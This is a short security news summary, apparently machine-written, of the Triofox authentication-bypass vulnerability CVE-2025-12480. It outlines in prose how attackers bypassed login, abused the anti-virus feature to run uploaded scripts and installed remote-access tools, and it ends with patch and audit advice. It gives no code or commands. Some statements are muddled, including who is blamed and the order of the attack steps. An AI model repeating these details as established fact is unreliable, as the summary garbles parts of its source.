Ethical Hacking News
Researchers expose a vulnerability in Gladinet's Triofox file-sharing platform, allowing attackers to bypass authentication and execute malicious payloads. The patch was released in version 16.7.10368.56560, but experts warn of the need for regular security audits and updates to prevent similar attacks.
Researchers discovered an unauthenticated access vulnerability in Gladinet's Triofox file-sharing and remote access platform (CVE-2025-12480). The vulnerability allowed attackers to bypass authentication, access configuration pages, and execute arbitrary payloads. An attacker could exploit this vulnerability by chaining it with the abuse of the built-in anti-virus feature to achieve code execution. Security measures were overlooked by system administrators, leading to a successful attack. The attackers used tools like Plink or PuTTy utility and PowerShell commands to execute malicious payloads and deploy additional malware. The vulnerability was patched in Triofox version 16.7.10368.56560, but security teams should still audit admin accounts and verify anti-virus configuration.
In a recent discovery, researchers at Mandiant Threat Defense exposed an unauthenticated access vulnerability within Gladinet's Triofox file-sharing and remote access platform. This n-day vulnerability, assigned CVE-2025-12480, allowed attackers to bypass authentication and access the application configuration pages, enabling the upload and execution of arbitrary payloads. The attack was successful because of a series of errors on the part of the system administrators who failed to enforce proper security measures.
The Triofox platform is a legitimate tool for remote access and file sharing but it seems that its creators overlooked basic security principles. An attacker could exploit this vulnerability by chaining it with the abuse of the built-in anti-virus feature to achieve code execution. The process started when an attacker exploited a host header attack, allowing them to bypass normal authentication checks.
To take full advantage of this vulnerability, attackers would need to use their own tools and exploits, such as the Plink or PuTTy utility. An attacker could then log in using the newly created admin account, upload malicious files, and execute them with the built-in anti-virus feature. The malicious batch script was configured by uploading an arbitrary file to any published share within the Triofox instance.
The attackers then used a PowerShell command to download and execute a second-stage payload. This payload was disguised as a legitimate copy of the Zoho Unified Endpoint Management System (UEMS) software installer, which allowed it to deploy the Zoho Assist and Anydesk remote access utilities on the host.
Furthermore, the attackers were able to use Zoho Assist to run commands that enumerated active SMB sessions and local and domain user information. They also attempted to change passwords for existing accounts and add new accounts to the local administrators and Domain Admins group.
The vulnerability was patched in Triofox version 16.7.10368.56560. However, researchers warn that security teams should audit admin accounts, and verify that Triofox's Anti-virus Engine is not configured to execute unauthorized scripts or binaries. Security teams should also hunt for attacker tools using hunting queries listed at the bottom of the post, and monitor for anomalous outbound SSH traffic.
The case highlights the importance of regular security audits and updates in protecting against such vulnerabilities. It also serves as a reminder that even legitimate tools can be exploited if not used with proper security measures in place.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Sudden-and-Sneaky-Vulnerability-How-Triofoxs-Unauthenticated-Access-Bug-Allowed-Attackers-to-Gain-Control-ehn.shtml
https://cloud.google.com/blog/topics/threat-intelligence/triofox-vulnerability-cve-2025-12480/
Published: Mon Nov 10 10:39:53 2025 by llama3.2 3B Q4_K_M
